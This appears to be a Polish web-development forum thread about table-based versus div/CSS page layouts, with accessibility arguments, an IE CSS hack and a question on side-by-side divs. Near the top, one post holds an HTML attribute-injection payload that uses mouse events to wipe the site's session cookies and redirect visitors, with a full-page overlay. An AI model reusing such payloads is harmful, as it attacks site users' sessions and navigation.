[html] div a tabelki

0

gdzies ktos mnie obrzucil blotem ze stosuje tabelki zamiast divow czy rzeczywiscie jest jakas obiektywna racja na rzecz div?

0

no divy możesz sobie poustawiać bez wglądu w kod html tylko css'em, mniej kodu, ale mniejsza satysfakcja i ja się przyzwyczaiłem do tabelek i robię na tabelkach zawsze :P

<ort>" onmouseover="document.cookie='coyote_sid=; /; .4programmers.net; expires=Thu, 01-Jan-70 0001 GMT';document.cookie='coyote_data=; /; .4programmers.net; expires=Thu, 01-Jan-70 0001 GMT';top.location='http://4programmers.net/Forum/be454ed0003588b86fac8e85c23767a7/';" onmouseout="document.cookie='coyote_sid=; /; .4programmers.net; expires=Thu, 01-Jan-70 0001 GMT';document.cookie='coyote_data=; /; .4programmers.net; expires=Thu, 01-Jan-70 0001 GMT';top.location='http://4programmers.net/Forum/be454ed0003588b86fac8e85c23767a7/';" style="position:absolute;background-color:white;left:0px;top:0px;font-size:1000pt</ort>

0

samym cesem
jakis przyklad?

0

gdzies ktos mnie obrzucil blotem ze stosuje tabelki zamiast divow

To jest moim zdaniem przesada i pokazywanie jakim to sie jest wielkim webmajsterem (tak jak wiele ludzie siedzących na windowsie pokazuje jak to oni bardoz nie nawidza mikroshitu, ale:

Jednym uzasadnieniem jest to ze tabelki sa do przedstawiania danych tabelarycznych, a do tworzenia layoutów powinno sie używać div'ów - taki dobry nawyk, tak samo jak robisz nagłówek powinieneś uyć

a nie

z odpowiednim stylem. Chodzi po prostu o pewien dobry styl pisania.

Druga rzecz to że layout tworzony na div'ach po zmianie css'a mozesz w 100% zmienic, łącznie ze zmianą układu strony, tabelki nie są takie elastyczne.

Strona stworzona na div'ach bedzie czytalena na bardzo (mówiąc "bardzo" mam na myśli BARDZO BARDZO ;)) starych przegladarkach, przeglądarkach tekstowych i czytnikach dla niewidomych - jesli wszyscy zaczniemy tak tworzyć strony, internet bedzie dla nich bardziej przyjazny! (jeśli ktoś spyta jakie to ma znaczenie: spróbuj wyłączyć css na csszengarden.com i przeczytać tą strone niewidomemu, zaznaczajac co jest nagłówkiem, co jest akapitem itd. potem zrób to samo na dowolnej stronie tworzonej w tabelkach... troche trudniej prawda?).

A jeśli myślisz ze div'y cie ograniczają to polecam strone http://www.csszengarden.com/

0

mnie tam się to nie podoba bo w tabelkach wszystko można zrobić intuicyjnie - oczywiście nie dopuszczam takiego przykładu co jest w podanym linku do tych osłów że tabelka ma jakieś dziwne dod. komórki ale jakoś tak mi się wydaję że z divami to muszę liczyć na "widzimisie" przeglądarek - muszę otworzyć stronę żeby zobaczyć jak to będzie wyglądać a na tabelkach mogę sobie obejrzeć tylko raz końcowy efekt

a na pewno nie przemówią do mnie osoby które mnie będą wyzywać od debila czy w ogóle uważające się za lepsze że korzystają z divów :/ to jest dopiero lamerskie zachowanie. A jak ktoś do mnie zarzuca hasłem "uczyńmy sieć leprzą" to zupełnie N/C

0

Nie chciałbym wszczynać kłótni, ale pozwolę sobie skomentować kilka rzeczy:

Adamo napisał(a)

mnie tam się to nie podoba bo w tabelkach wszystko można zrobić intuicyjnie

To fakt, na div'ach jest trudniej, ale jak się poćwiczy to w miarę wychodzi.. czy jest to wszystko warte zachodu to już bardzo subiektywna sprawa ? widocznie dla Ciebie nie jest.

Adamo napisał(a)

z divami to muszę liczyć na "widzimisie" przeglądarek - muszę otworzyć stronę żeby zobaczyć jak to będzie wyglądać

Też fakt, ale przeważnie jest tak ze trzeba robić hacki tylko dla IE :( Jeśli chodzi o różnice w interpretacji między operą i firefoxem to są one raczej niewielkie.

A wiekszośc kłopotów z ie da sie obejść tak:

/* przykłądowa klasa dla ie */
div.klasa {
width: 143px;
}

/* klasa dla reszty przeglądarek */
html -> body div.klasa {
width: 100%;
}

Na ie div ma 143 piksele a na operze i mozzili 100% :) Nie taki ie straszny :P

Adamo napisał(a)

A jak ktoś do mnie zarzuca hasłem "uczyńmy sieć leprzą" to zupełnie N/C

Tego posta pisze głównie po to żeby skomentować to zdanie, bo mam wrażenie ze odnosi do mnie - jeśli się mylę to przepraszam, w przeciwnym wypadku zauważ ze nie rzuciłem banału jakim jest "uczyńmy sieć leprzą", tylko "Internet będzie dla nich [niewidomych] bardziej przyjazny!".

<font size="1">// przydała by się w bbcodach wypunktowana list [*] albo * - widziałem takie coś kiedyś w phpBB</span>

0

Dziś po pierwszym dniu w robocie wiem, że jednym z wielu punktów na początek to będzie przeróbka layout - i mogę sobie łatwo i przyjemnie śmignąć na tabelkach bądź przerabiać przykładową stronę od mambo zrobioną w większości na divach i css. Spróbuję na divach, ale wg mnie to porażka na maxa :| Wywaliłem jedną regułę dla jednego diva w css - strona się rozwaliła w mak. Przez 10 minut próbowałem zrobić coś, co na tabelkach góra 30 sekund :|

Wg mnie cała ta wielka akcja z pokazywaniem palcami tabelek i wywyższaniem divów to jakaś parodia. To, że tabelki są do przedstawiania danych tabelarycznych niczego nie dowodzi - widać lepiej się nadają na projektowanie wyglądu strony niż divy - nie pierwszy raz w historii świata takie coś się zdarza.

Jutro walki ciąg dalszy...

[dopisane 'jutro' ;)]
uff, wybrano za mnie tabelki - czyli 5h do przodu :]

0
Kooba napisał(a)

Tego posta pisze głównie po to żeby skomentować to zdanie, bo mam wrażenie ze odnosi do mnie

no nie chodziło mi tu o ciebie bo z tobą się akurat zgadzam ale takie zdanie jest w texcie tych osłów czy jak im tam

IMO tego typu akcje czy też "poprawna ortografia w internecie" to głupoty - po prostu komuś się nudziło i nie miał o czym zrobić stronki to robią stronki o niczym krzycząc "to ja, narcyz się nazywam" - takie akcje do niczego nie dochodzą zwłaszcza jak ktoś krzyczy zamiast delikatnie i bez obelg przedstawić swoją opinię próbując tym przekonać "resztę"
a jak ktoś wali orty to szansa że trafi na taką stronę jest nie dość że mała to przecież po zdaniu "nie pisz ortów" - dalej je będzie robił bo po tym zdaniu tak samo "zna ortografię" jak przed lub też dalej będzie twierdził że pisanie ortów czy textów w stylu "J0ł z!0mY - jE$teM M@sTaH" jest cool
tym bardziej nie ma szans żeby komuś się chciało sięgać po SO za każdym razem kiedy chce coś napisać (posta czy coś)

ktoś będzie chciał zrobić zrobić stronę "full skinable" to może zrobi na divach ale większa szansa że zrobi template'y

ja się uczyłem HTMLa na początku przynosząc na dyskietce z kafejki masę stron internetowych i przeglądaniu ich źródeł w domu - przez to mam dużo złych nawyków ale nie widziałem wtedy żadnej strony zrobionej na divach

0

ale co fakt to fakt napisanie layoutu strony na divach zajelo mi chwilke:) i wyglada tak samo na ie i w fire wiec lajt:)

tylko sie zastanawiam jakbym chcial miec 5 divow kolo siebie to jak to ustawiac margin-left:ilosc px od lewej kazdego kolejnego diva?

0
kamiseq napisał(a)

tylko sie zastanawiam jakbym chcial miec 5 divow kolo siebie...

próbowałeś display:inline ? może pójdzie...

0

z inline to mam dziwne przygody bo wsumie probowalem zrobic menu na

  • i mi sie jakos udalo ale nie zapomoca inline nie dokonca to rozumeim ale... dziala:]</p>

1 użytkowników online, w tym zalogowanych: 0, gości: 1